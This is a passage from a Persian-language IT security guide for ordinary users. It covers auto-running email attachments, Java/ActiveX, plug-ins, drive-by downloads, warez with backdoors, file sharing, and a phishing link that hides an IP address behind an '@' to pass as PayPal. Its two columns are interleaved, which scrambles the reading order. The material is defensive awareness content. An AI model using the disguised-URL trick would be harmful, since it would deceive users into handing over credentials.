‫ﻣﻲ ﮔﺮﺩﻧﺪ )‪ ،Java ،Javascript‬ﻭ ‪ .(ActiveX‬ﺍﮔﺮ ﺑﻪ ﻣﺮﻭﺭﮔﺮ ﺧﻮﺩ‬ ‫ﺳﻴﺴﺘﻢ ﻣﺠﺒﻮﺭ ﺑﻮﺩﻧﺪ ﻣﺪﺍﻭﻣﹰﺎ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺍﻃﻤﻴﻨﺎﻥ ﺩﻫﻨﺪ ﻛﻪ ﺍﻳﻦ‬
‫ﺍﻣﺮ "ﻏﻴﺮ ﻣﻤﻜﻦ" ﺍﺳﺖ‪ ،‬ﻭ ﺗﺎ ﺯﻣﺎﻧﻴﻜﻪ ﻓﺎﻳﻞ ﺿﻤﻴﻤﻪ ﺑـﻪ ﺍﺟـﺮﺍ ﺩﺭ‬
‫ﺍﺟﺎﺯﻩ ﺩﻫﻴﺪ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫـﺎ ﺭﺍ ﺑـﺪﻭﻥ ﺑﺮﺭﺳـﻲ ﻗﺎﺑﻠﻴـﺖ ﺍﻃﻤﻴﻨـﺎﻥ‬
‫ﻧﻴﺎﻳﺪ‪ ،‬ﻣﺎﺷﻴﻦ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﺁﻥ ﺩﺭ ﺍﻣﻨﻴﺖ ﻛﺎﻣﻞ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻣﻮﺭﺩ ﻧﻈﺮ ﺍﺟﺮﺍ ﻛﻨﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺧﻲ ﺍﺯ ﻣـﻮﺍﺭﺩ ﺭﺍ‬
‫ﺑﺮﺧﻼﻑ ﺁﻧﭽﻪ ﻛﻪ ﺑﺎﻳﺪ‪ ،‬ﺍﺟﺮﺍ ﻧﻤﺎﻳﺪ‪ .‬ﺑﺮﻧﺎﻣﺔ ‪ Javascript‬ﺑﻄـﻮﺭ‬ ‫ﺁﻟﻮﺩﻩ ﺷﺪﻥ ﺍﺯ ﻃﺮﻳﻖ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻣﺮﻭﺯ ﺩﻳﮕﺮ ﺍﻣـﺮ ﻣﺤـﺎﻟﻲ‬
‫ﻛﻠﻲ ﺍﻳﻤﻦ ﺍﺳـﺖ‪ ،‬ﺍﻣـﺎ ‪ Java‬ﻭ ‪ ActiveX‬ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﺴﻴﺎﺭ‬ ‫ﻧﻴﺴﺖ ﻭ ﺩﺭﻭﺍﻗﻊ ﺑﺴﻴﺎﺭ ﻫﻢ ﻣﺤﺘﻤﻞ ﺍﺳﺖ‪ .‬ﺩﻭ ﻗﺎﺑﻠﻴﺖ ﺍﺿﺎﻓﻪﺷﺪﻩ‬
‫ﻻ ﻣﻲﺗﻮﺍﻥ ﻣﺮﻭﺭﮔﺮﻫـﺎ ﺭﺍ ﻃـﻮﺭﻱ ﺗﻨﻈـﻴﻢ‬ ‫ﺧﻄﺮﻧﺎﻙ ﺑﺎﺷﻨﺪ‪ .‬ﻣﻌﻤﻮ ﹰ‬ ‫ﺑﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎﻋﺚ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺷﺪﻩﺍﻧﺪ‪.‬‬
‫ﻛﺮﺩ ﻛﻪ ﺑﻪ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺍﺟﺎﺯﻩ ﺍﺟﺮﺍ ﻧﺪﻫﻨﺪ ﻭ ﻳﺎ ﻗﺒـﻞ ﺍﺯ ﺍﺟـﺮﺍﻱ‬ ‫ﺍﻭﻟﻴﻦ ﺗﻐﻴﻴﺮ ﺍﻳﻦ ﺍﺳﺖ ﻛـﻪ ﺍﻣـﺮﻭﺯﻩ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻳﻲ ﺑـﺮﺍﻱ ﭘـﺴﺖ‬
‫ﺁﻧﻬﺎ ﺍﺯ ﻛﺎﺭﺑﺮ ﺍﺟﺎﺯﻩ ﺑﮕﻴﺮﻧﺪ‪.‬‬ ‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﻣـﻲ ﺗﻮﺍﻧﻨـﺪ ﺿـﻤﺎﻳﻢ ﺭﺍ ﺑـﺼﻮﺭﺕ‬
‫ﺧﻮﺩﻛﺎﺭ ﺍﺟﺮﺍ ﻧﻤﺎﻳﻨﺪ‪ .‬ﺩﺭ ﮔﺬﺷﺘﻪ ﻛﺎﺭﺑﺮ ﻓﺎﻳﻞ ﺿﻤﻴﻤﻪ ﺭﺍ ﺫﺧﻴـﺮﻩ ﻭ‬
‫‪Plug-in‬ﻫﺎ ﻭ ‪Add-on‬ﻫﺎ‬
‫ﺳﭙﺲ ﺁﻧﺮﺍ ﺍﺟﺮﺍ ﻣﻲﻛـﺮﺩ‪ ،‬ﺍﻣـﺎ ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ ﺍﺟـﺮﺍﻱ ﺧﻮﺩﻛـﺎﺭ‬
‫ﻣﺮﻭﺭﮔﺮﻫﺎﻱ ﻭﺏ ﻭ ﺑﺴﻴﺎﺭﻱ ﺑﺮﻧﺎﻣﻪ ﻫﺎﻱ ﺩﻳﮕﺮ )ﻣﺜﻞ ﭘﺮﺩﺍﺯﺷﮕﺮﻫﺎﻱ‬ ‫ﺿــﻤﺎﺋﻢ ﻛﺎﺭﻫــﺎ ﺭﺍ ‪ -‬ﻣﺨــﺼﻮﺻﹰﺎ ﺑــﺮﺍﻱ ﻛــﺎﺭﺑﺮﺍﻥ ﻣﺒﺘــﺪﻱ ﻛــﻪ‬
‫ﻛﻠﻤﻪ‪ ٥٧‬ﻭ ﺻﻔﺤﺎﺕ ﮔﺴﺘﺮﺩﻩ‪ (٥٨‬ﺑﻪ ﺑﺮﺧﻲ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺍﺟﺎﺯﺓ ﺍﺟﺮﺍ ﺷﺪﻥ‬ ‫ﻣﻲﺧﻮﺍﻫﻨﺪ ﺑﺪﻭﻥ ﺍﻧﺠﺎﻡ ﻋﻤﻠﻴﺎﺕ ﺍﺿﺎﻓﻪ ﺁﻧﭽﻪ ﻛﻪ ﻓﺮﺳﺘﺎﺩﻩ ﺷـﺪﻩ‬
‫ﺍﺳﺖ ﺭﺍ ﺑﺒﻴﻨﻨﺪ ‪ -‬ﺳﺎﺩﻩﺗﺮ ﻛﺮﺩﻩ ﺍﺳﺖ‪.‬‬
‫‪56‬‬ ‫‪World-Wide Web‬‬
‫‪57‬‬ ‫‪Word Processors‬‬
‫‪58‬‬ ‫‪Spreadsheets‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٧٦‬‬

‫‪٦٠‬‬
‫ﻫﺪﺍﻳﺖ ﺑﻮﺳﻴﻠﺔ ‪download‬ﻫﺎ‬ ‫ﺍﺯ ﺩﺍﺧﻞ ﺑﺮﻧﺎﻣﺔ ﺍﺻـﻠﻲ ﺭﺍ ﻣـﻲ ﺩﻫﻨـﺪ‪ .‬ﻧﻤﻮﻧـﺔ ﺭﺍﻳـﺞ ﺁﻥ ﺑﺮﻧﺎﻣـﺔ‬
‫"‪ "Adobe Acrobat Reader‬ﺍﺳـﺖ ﻛـﻪ ﺑـﻪ ﺷـﻤﺎ ﺍﺟـﺎﺯﻩ‬
‫"ﻫﺪﺍﻳﺖ ﺑﻮﺳﻴﻠﻪ ‪download‬ﻫﺎ" ﺯﻣﺎﻧﻲ ﺭﺥ ﻣﻲﺩﻫﺪ ﻛﻪ ﺑﻪ ﻳﻚ‬
‫ﻣﻲﺩﻫﺪ ﻫﻨﮕﺎﻡ ﻣـﺮﻭﺭ ﻭﺏ‪ ،‬ﻓﺎﻳﻠﻬـﺎﻱ ‪ PDF‬ﺭﺍ ﻣـﺸﺎﻫﺪﻩ ﻛﻨﻴـﺪ‪.‬‬
‫ﭘﺎﻳﮕــﺎﻩ ﻭﺏ ﻣﺮﺍﺟﻌــﻪ ﻣــﻲﻛﻨﻴــﺪ ﻭ ﺑﺮﻧﺎﻣــﻪ ‪ HTML‬ﻣﻮﺟــﻮﺩ ﺩﺭ‬
‫ﻫﻨﮕﺎﻣﻴﻜــﻪ ‪plug-in‬ﻫــﺎ ﻳــﺎ ‪add-on‬ﻫــﺎ ﻧــﺼﺐ ﻣــﻲﺷــﻮﻧﺪ‬
‫ﺻﻔﺤﻪ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﻳـﻚ ﺑﺮﻧﺎﻣـﺔ ‪ Java‬ﻳـﺎ ‪ ActiveX‬ﺭﺍ‬
‫ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﻫﺮ ﻛﺎﺭﻱ ﻛﻪ ﺑﺮﻧﺎﻣﺔ ﺍﺻﻠﻲ ﺍﻧﺠﺎﻡ ﻣـﻲﺩﻫـﺪ ‪ -‬ﻣﺎﻧﻨـﺪ‬
‫ﺩﺭﺧﻮﺍﺳــﺖ ﻣــﻲﻛﻨــﺪ ﻭ ﺁﻥ ﺑﺮﻧﺎﻣــﻪ ﻧﻴــﺰ ﻳــﻚ ﺑﺮﻧﺎﻣــﺔ ﺩﻳﮕــﺮ ﺭﺍ‬
‫ﺧﻮﺍﻧﺪﻥ ﺍﺯ ﺩﻳـﺴﻚ ﻭ ﻧﻮﺷـﺘﻦ ﺭﻭﻱ ﺁﻥ ﻳـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﺭﺗﺒـﺎﻁ‬
‫‪ download‬ﻣــﻲﻧﻤﺎﻳــﺪ‪ ،‬ﺁﻧــﺮﺍ ﺍﺟــﺮﺍ ﻣــﻲﻧﻤﺎﻳــﺪ‪ ،‬ﻳــﺎ ﻃــﻮﺭﻱ‬
‫ﺷﺒﻜﻪ ‪ -‬ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﻨﺪ‪ ،‬ﻭ ﻟﺬﺍ ﺗﻨﻬﺎ ﺑﺎﻳﺪ ﺯﻣـﺎﻧﻲ ﻧـﺼﺐ ﺷـﻮﻧﺪ ﻭ‬
‫ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻣﻲﻛﻨﺪ ﻛﻪ ﺩﺭ ﺁﻳﻨﺪﻩ ﺑﺘﻮﺍﻧﺪ ﺁﻧـﺮﺍ ﺑـﻪ ﺍﺟـﺮﺍ ﺩﺭ ﺁﻭﺭﺩ‪.‬‬
‫ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻧﺪ ﻛﻪ ﻣﺒﺪﺃ ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﻣـﻮﺭﺩ ﺍﻃﻤﻴﻨـﺎﻥ‬
‫ﻫﻤﭽﻨﻴﻦ ﻛﺪ ‪ HTML‬ﻣﻲﺗﻮﺍﻧﺪ ﻭﺍﺭﺩ ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﮔـﺮﺩﺩ‪.‬‬
‫ﺑﺎﺷﺪ‪.‬‬
‫ﺍﮔﺮ ﺑﻪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ‪ Java‬ﻳﺎ ‪ ActiveX‬ﺑـﺪﻭﻥ ﺍﻳﻨﻜـﻪ ﺍﺯ ﺷـﻤﺎ‬
‫ﺍﺟﺎﺯﻩ ﺑﮕﻴﺮﻧﺪ ﻭ ﻳﺎ ﺣﺘﻲ ﺑﻪ ﺷﻤﺎ ﺍﻃﻼﻉ ﺩﻫﻨﺪ ﺍﺟﺎﺯﺓ ﻧﺼﺐ ﻛﺮﺩﻥ‬ ‫ﺣﻔﺮﻩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ‬
‫ﺑﺮﻧﺎﻣﻪ ﺩﺍﺩﻩ ﺑﺎﺷﻴﺪ‪ ،‬ﺁﻧﮕﺎﻩ ﺧﻮﺍﻫﻨﺪ ﺗﻮﺍﻧﺴﺖ ‪ download‬ﺷﻮﻧﺪ ﻭ‬
‫ﻫﺮﭼﻪ ﺭﺍ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻨﺪ ﻧﺼﺐ ﻧﻤﺎﻳﻨﺪ‪.‬‬ ‫ﺣﻔﺮﻩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺍﺷﻜﺎﻻﺗﻲ ﺩﺭ ﺑﺨﺸﻬﺎﻳﻲ ﺍﺯ ﺳﻴﺴﺘﻢ ﻋﺎﻣـﻞ ﻳـﺎ‬
‫ﺩﻳﮕﺮ ﺍﺟﺰﺍﻱ ﺳﻴﺴﺘﻢ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﻪ ﻣﻬﺎﺟﻢ ﺍﺟﺎﺯﺓ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ‬
‫ﺑﻲﺍﻋﺘﻤﺎﺩﻱ ﺑﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺴﺮﻭﻗﻪ‬ ‫ﺍﻃﻼﻋﺎﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ﺳﻴﺴﺘﻢ ﻳﺎ ﻛﻨﺘﺮﻝ ﺁﻧﺮﺍ ﻣﻲﺩﻫﻨﺪ‪ .‬ﺩﺭ ﺳﺎﻟﻬﺎﻱ‬
‫ﺍﺧﻴﺮ ﺍﻛﺜﺮ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﮔﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺑـﺎ ﺳـﺮﻋﺖ ﻗﺎﺑـﻞ ﻗﺒـﻮﻟﻲ ﺑـﻪ‬
‫ﻣﻔﻬﻮﻡ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺗﺠﺎﺭﻱ ﻣﺴﺮﻭﻗﻪ ﻣﻔﻬﻮﻡ ﺗﺎﺯﻩﺍﻱ ﻧﻴﺴﺖ‪ .‬ﭼﻨـﺪﻳﻦ‬
‫ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻳﺸﺎﻥ ﻛﺸﻒ ﻣﻲﺷـﻮﺩ ﭘﺎﺳـﺦ‬
‫ﺳﺎﻝ ﺍﺳﺖ ﻛﻪ ﺩﻳﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﺓ ﺟﻌﻠـﻲ ﻓﺮﻭﺧﺘـﻪ ﻣـﻲﺷـﻮﻧﺪ ﻭ‬
‫ﻣﻲﺩﻫﻨﺪ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﮔﺮ ﺑﺼﻮﺭﺕ ﻣﻨﻈﻢ ﻭﺻﻠﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺭﻭﻱ‬
‫ﻧﺴﺨﻪﻫﺎﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺁﻧﻬﺎ ‪ -‬ﻛﻪ ‪ Warez‬ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﻧﺪ ‪ -‬ﻧﻴﺰ‬
‫ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺍﻋﻤﺎﻝ ﻛﻨﻴﺪ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﻗﺒـﻞ ﺍﺯ ﺍﻧﺘـﺸﺎﺭ ﮔـﺴﺘﺮﺩﺓ‬
‫ﺭﺍﻳﺞ ﻫﺴﺘﻨﺪ‪ .‬ﺍﺯ ﻣﺪﺗﻬﺎ ﭘﻴﺶ ﺍﻳﻦ ﺳﻮﺀ ﻇﻦ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﻛﻪ ﺍﻳﻦ‬
‫ﺍﺷﻜﺎﻻﺕ‪ ،‬ﺭﺍﻫﻬﺎﻱ ﻧﻔﻮﺫ ﺭﺍ ﺑﺮ ﻣﻬﺎﺟﻤﺎﻥ ﺑﺒﻨﺪﻳﺪ‪.‬‬
‫ﺩﻳﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﻩ ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﺣﺎﻭﻱ ﻭﻳﺮﻭﺱ ﺑﺎﺷﻨﺪ‪ ،‬ﺍﻣﺎ ﺍﺣﺘﻤـﺎﻝ‬
‫ﺑﻴﺸﺘﺮﻱ ﻛﻪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﻳﻦ ﻧﻮﻉ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﻤﻜـﻦ‬ ‫‪٥٩‬‬
‫ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻠﻬﺎ‬
‫ﺍﺳﺖ ﺗﻌﻤﺪﹰﺍ ﺣﺎﻭﻱ ﻭﺻﻠﻪﺍﻱ ﺑﺎﺷﺪ ﻛﻪ ﻳﻚ ﻓﺮﺩ ﻏﻴﺮ ﻣﺠﺎﺯ ﺭﺍ ﻗﺎﺩﺭ‬
‫ﻣﻲﺳﺎﺯﺩ ﻛﻪ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﺪ‪.‬‬ ‫ﺑــﻪﺍﺷــﺘﺮﺍﻙﮔــﺬﺍﺭﻱ ﻓﺎﻳــﻞ ﺩﺭ ﺍﺷــﻜﺎﻝ ﻣﺨﺘﻠــﻒ ﺩﺭ ﻫﻤــﺔ‬
‫ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻧﺼﺐ ﺍﻏﻠﺐ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺑﻪ ﺍﻣﺘﻴﺎﺯ ﺩﺳﺘﺮﺳﻲ ﺭﺍﻫﺒـﺮﻱ‬ ‫ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺍﺷـﺘﺮﺍﻙ ﻓﺎﻳـﻞ ﺩﺭ ﻣﻴـﺎﻥ ﻛﺎﺭﻣﻨـﺪﺍﻥ‬
‫ﻧﻴــﺎﺯ ﺩﺍﺭﺩ‪ ،‬ﺍﻳــﻦ ﺭﻭﺵ ﻓﺮﺻــﺖ ﻣﻨﺎﺳــﺒﻲ ﺑــﺮﺍﻱ ﻧــﺼﺐ ﺷــﺪﻥ‬ ‫ﻳﻚ ﺷﺮﻛﺖ ﻛﺎﺭ ﺑـﺴﻴﺎﺭ ﻣﻔﻴـﺪﻱ ﺍﺳـﺖ‪ .‬ﺍﮔـﺮ ﭼﻨـﺪﻳﻦ ﺩﺳـﺘﮕﺎﻩ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﺷﻤﺎ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭﺧﻮﺍﺳﺖ ﻧﻜﺮﺩﻩﺍﻳﺪ ﻓﺮﺍﻫﻢ ﻣﻲﺁﻭﺭﺩ‪.‬‬ ‫ﻣﺨﺘﻠﻒ ﺩﺍﺭﻳﺪ‪ ،‬ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ ﻣﻴﺎﻥ ﺁﻧﻬﺎ ﻳﻚ ﻗﺎﺑﻠﻴﺖ ﺑﺴﻴﺎﺭ ﻣﻮﺭﺩ‬
‫ﻧﻴﺎﺯ ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪ .‬ﺑﺎ ﺍﻳـﻦ ﻭﺟـﻮﺩ ﺍﮔـﺮ ﺍﺯ ﺭﻭﺵ ﺍﺷـﺘﺮﺍﻙ ﻓﺎﻳـﻞ ﺍﺯ‬
‫ﻋﻤﻠﻜﺮﺩﻫﺎﻱ ﭘﻨﻬﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺳﺎﻟﻢ‬ ‫ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴـﺪ ﻭ ﺳﻴﺎﺳـﺖ ﺍﻣﻨﻴﺘـﻲ ﻣﻨﺎﺳـﺒﻲ‬
‫ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ )ﻣﺜﻞ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﻣﻨﺎﺳـﺐ ﻭ ﻣﺤـﺪﻭﺩ‬
‫ﺍﮔﺮﭼﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺍﻛﺜـﺮ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻳﻲ ﻛـﻪ ‪download‬‬
‫ﺑﻮﺩﻥ ﺍﻣﺘﻴﺎﺯ ﻧﻮﺷﺘﻦ ﻭ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ( ﻧﺪﺍﺭﻳـﺪ‪ ،‬ﺁﻧﮕـﺎﻩ ﻫـﺮ ﻣﻬـﺎﺟﻤﻲ ﺩﺭ‬
‫ﻣﻲﻛﻨﻴﺪ ﺳﺎﻟﻢ ﺑﺎﺷﻨﺪ‪ ،‬ﺍﻣﺎ ﺍﺣﺘﻤﺎﻝ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻧﺮﻡﺍﻓﺰﺍﺭ‬
‫ﺩﻧﻴﺎ ﻫﻢ ﺧﻮﺍﻫﺪ ﺗﻮﺍﻧﺴﺖ ﻓﺎﻳﻠﻬﺎﻱ ﺷﻤﺎ ﺭﺍ ﺑـﻪ ﺍﺷـﺘﺮﺍﻙ ﺑﮕـﺬﺍﺭﺩ‪.‬‬
‫‪ download‬ﺷﺪﻩ )ﻣﺨﺼﻮﺻﹰﺎ ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺭﺍﻳﮕـﺎﻥ( ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ‬
‫ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﺍﮔﺮ ﺑﻪ ﺩﻳﮕﺮﺍﻥ ﺍﺟﺎﺯﻩ ﺩﻫﻴﺪ ﻛـﻪ ﺭﻭﻱ ﺩﻳـﺴﻜﻬﺎﻱ‬
‫ﺩﻳﮕﺮﻱ ﺭﺍ ﺭﻭﻱ ﺩﺳﺘﮕﺎﻩ ﺷﻤﺎ ﻧﺼﺐ ﻧﻤﺎﻳﺪ‪ .‬ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﺷـﺘﺮﺍﻙ‬
‫ﺷﻤﺎ ﺍﻣﻜﺎﻥ ﻧﻮﺷﺘﻦ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ ،‬ﺁﻧﮕﺎﻩ ﻣﻬﺎﺟﻢ ﺧﻮﺍﻫﺪ ﺗﻮﺍﻧـﺴﺖ‬
‫ﻣﺘﻘﺎﺑﻞ ﻓﺎﻳﻠﻬﺎ‪ ٦١‬ﺑﺴﻴﺎﺭ ﻣـﺴﺘﻌﺪ ﭼﻨـﻴﻦ ﻭﺿـﻌﻴﺘﻲ ﻫـﺴﺘﻨﺪ‪ .‬ﺍﻳـﻦ‬
‫ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺭﺍ ﺑﻪ ﺷﻜﻞ ﺩﻟﺨﻮﺍﻩ ﺧﻮﺩ ﺗﻨﻈﻴﻢ ﻛﻨﺪ‪.‬‬
‫ﻻ ﺷﺎﻣﻞ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﺩﻳﮕـﺮﻱ ﻣـﻲﺑﺎﺷـﻨﺪ ﻛـﻪ‬ ‫ﺑﺮﻧﺎﻣﻪﻫﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺁﻧﻬﺎ ﺩﺭ ﻧﻮﻉ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺭﺩﻳـﺎﺑﻲ ﻭ ﺍﻋﻤـﺎﻝ ﺗﻐﻴﻴـﺮ ﺩﺭ‬
‫ﻭﺏ ﻃﺒﻘﻪﺑﻨﺪﻱ ﻣﻲﺷﻮﻧﺪ ﻭ ﮔﺮﺩﺵ ﻭﺏ ﺷﻤﺎ ﺭﺍ ﻧﻈﺎﺭﻩ ﻣﻲﻛﻨﻨـﺪ‪،‬‬

‫‪60‬‬ ‫‪Drive By Downloads‬‬ ‫‪59‬‬ ‫‪File Sharing‬‬


‫‪61‬‬ ‫‪Peer-to-Peer File Sharing‬‬
‫‪٧٧‬‬ ‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬

‫ﺍﮔﺮ ﻓﺮﺩﻱ ﺑﺎ ﺭﻳﺰﻩﻛﺎﺭﻳﻬـﺎﻱ ﻗﺎﻟـﺐ ‪ URL‬ﺁﺷـﻨﺎ ﻧﺒﺎﺷـﺪ ﺗـﺼﻮﺭ‬ ‫ﺍﻧﻮﺍﻉ ﺗﺒﻠﻴﻐﺎﺕ ﺭﺍ ﺑﻪ ﻧﻤﺎﻳﺶ ﺩﺭﻣﻲﺁﻭﺭﻧﺪ ﻭ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺷـﻤﺎ ﺭﺍ ﺑـﻪ‬
‫ﻣﻲﻛﻨﺪ ﻛﻪ ﺍﻳﻦ ﺁﺩﺭﺱ ﻫﻤﺎﻥ ‪ www.paypal.com‬ﺍﺳـﺖ ﻭ‬ ‫ﻣــﺪﻳﺮ ﺧــﻮﺩ ﮔــﺰﺍﺭﺵ ﻣــﻲﻧﻤﺎﻳﻨــﺪ‪ .‬ﺑﺮﺧــﻲ ﺍﺯ ﺍﻳــﻦ ﺑﺮﻧﺎﻣــﻪﻫــﺎ‬
‫ﻟﺬﺍ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﻣﻲ ﺑﺎﺷﺪ‪ ،‬ﺍﻣﺎ ﺩﺭ ﺣﻘﻴﻘﺖ ﻧﺒﺎﻳـﺪ ﻛﺎﺭﺍﻛﺘﺮﻫـﺎﻳﻲ‬ ‫ﺩﺳﻴﺴﻪﺁﻣﻴﺰ ﻫﺴﺘﻨﺪ‪ ،‬ﺑﺪﻳﻦ ﺻﻮﺭﺕ ﻛﻪ ﺳﻌﻲ ﺩﺍﺭﻧﺪ ﺧﻮﺩ ﺭﺍ ﭘﻨﻬﺎﻥ‬
‫ﻛﻪ ﻗﺒﻞ ﺍﺯ ﻋﻼﻣﺖ @ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ ﺭﺍ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺖ؛ ﺯﻳﺮﺍ ﺍﻳﻦ‬ ‫ﻛﻨﻨﺪ ﻭ ﺗﻘﺮﻳﺒﹰﺎ ﻏﻴﺮ ﻗﺎﺑﻞ ﺣﺬﻑ ﺑﺎﺷـﻨﺪ‪ .‬ﭼﻨـﻴﻦ ﺑﺮﻧﺎﻣـﻪﺍﻱ ﺩﺍﺭﺍﻱ‬
‫ﻻ‬
‫‪ URL‬ﺑﻪ ﺁﺩﺭﺱ ‪ 218.5.79.162‬ﻣﺘﺼﻞ ﻣﻲ ﺷـﻮﺩ‪ .‬ﻣﻌﻤـﻮ ﹰ‬ ‫ﻳﻚ ﺍﺑﺰﺍﺭ ‪ uninstall‬ﺍﺳﺖ ﻛﻪ ﺍﮔﺮ ﺁﻧـﺮﺍ ﺍﺟـﺮﺍ ﻛﻨﻴـﺪ‪ ،‬ﺁﻥ ﺍﺑـﺰﺍﺭ‬
‫ﺩﺭ ﺍﻳــﻦ ﭘﺎﻳﮕــﺎﻩ ﻭﺏ ﻧﻴــﺰ ﺻــﻔﺤﻪﺍﻱ ﻣــﺸﺎﺑﻪ ﺻــﻔﺤﺔ ﻭﺍﻗﻌــﻲ‬ ‫‪ uninstall‬ﺭﺍ ﭘﺎﻙ ﻣﻲ ﻛﻨﺪ‪ ،‬ﻭﻟﻲ ﺑﺮﻧﺎﻣـﺔ ﺍﺻـﻠﻲ ﻫﻨـﻮﺯ ﻭﺟـﻮﺩ‬
‫‪ PayPal‬ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺷـﺪﻩ ﻭ ﺍﺯ ﺷـﻤﺎ ﻣـﻲﺧﻮﺍﻫـﺪ ﻛـﻪ ﻭﺍﺭﺩ ﺁﻥ‬ ‫ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ ﻭ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺧﻮﺍﻫﺪ ﺁﻣﺪ‪.‬‬
